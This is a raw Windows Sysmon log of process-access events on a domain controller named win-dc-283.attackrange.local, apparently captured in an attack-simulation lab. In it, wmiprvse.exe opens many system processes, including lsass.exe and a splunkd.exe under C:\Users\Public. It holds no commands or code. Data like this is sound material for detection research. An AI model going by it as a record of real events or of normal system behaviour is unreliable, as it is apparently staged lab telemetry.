16:00:03.287{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2800-00000000A301}2544C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028485Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:03.287{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4990-6008-2600-00000000A301}3044C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028484Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:03.287{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-498C-6008-2400-00000000A301}2932C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028483Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:03.287{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-498C-6008-2300-00000000A301}2924C:\Users\Public\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028482Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:03.287{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4988-6008-2000-00000000A301}2388C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028481Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:03.287{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1700-00000000A301}1656C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028480Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:03.271{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1600-00000000A301}1536C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028479Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:03.271{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1500-00000000A301}1492C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028478Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:03.271{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1400-00000000A301}1280C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028477Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:03.271{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1300-00000000A301}1264C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028476Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:03.271{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1200-00000000A301}1176C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028475Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:03.271{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1100-00000000A301}1152C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028474Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:03.271{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1000-00000000A301}1160C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028473Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:03.271{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0F00-00000000A301}1112C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028472Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:03.271{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0E00-00000000A301}1080C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028471Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:03.271{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0D00-00000000A301}996C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028470Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:03.271{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4986-6008-0C00-00000000A301}608C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028469Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:03.271{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4985-6008-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028468Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:03.271{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4984-6008-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028467Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:03.099{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5382-6008-8506-00000000A301}6424C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028466Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 